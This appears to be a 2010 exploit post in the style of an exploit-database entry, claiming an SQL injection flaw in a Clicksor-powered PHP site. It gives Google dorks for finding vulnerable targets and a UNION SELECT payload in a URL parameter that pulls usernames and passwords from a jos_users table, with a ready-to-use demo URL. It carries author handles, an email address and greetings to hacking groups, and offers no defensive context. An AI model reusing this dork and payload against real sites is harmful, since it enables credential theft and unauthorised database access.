30 lines
No EOL
1.3 KiB
Text
30 lines
No EOL
1.3 KiB
Text
( ALLH AKBAR )
|
|
|
|
#####################################################################################################
|
|
# Exploit Title: [Clicksor SQL Injecti0n Vulnerability] -::DESCRIPTION
|
|
# Date: [4 de mayo de 2010] -::DATE
|
|
# Author: [ JM511 ] EmaiL : p3w@hotmail.com , JSQLM@hotmail.com -::AUTHOR
|
|
# From :\ Saudi Arabia ,
|
|
# Greetz to: [ GoLdeN-Z3r0 , Dr.Exe , Sec-q8 , Shi5 aL Hacker , SaFa7 al3nzee , BlacK DeaTh ]
|
|
# Home : www.Sec-CenTer.com , www.JM511.com
|
|
# Platform / Tested on: [php] -::TYPE
|
|
# category: [SQL Injecti0n]
|
|
# d0rK g00gl3 :- " inurl:index.php?= " Or " Powered by Clicksor.com Contextual Advertising "
|
|
#
|
|
######################################################################################################
|
|
#[ Exploit ]#
|
|
|
|
[»] http://[target].com/index.php?page=view&id=511 <== [ SQL ]
|
|
|
|
[»] SQL : -511+UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8+from+parapara_copp1.jos_users
|
|
|
|
#[ DEMO ]# * l0uk o That : <title> 1> 3 > 4 </title>
|
|
|
|
|
|
[»] http://server/index.php?page=view&id=-511+UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8+from+parapara_copp1.jos_users
|
|
|
|
################################################################################
|
|
|
|
Greetings to: D7ooM-JpeeL , DLO , Virus511 , Security Hacker , ALL Team 511 , ALL MuslimS
|
|
|
|
# ~ - [ [ : arab : ] ] |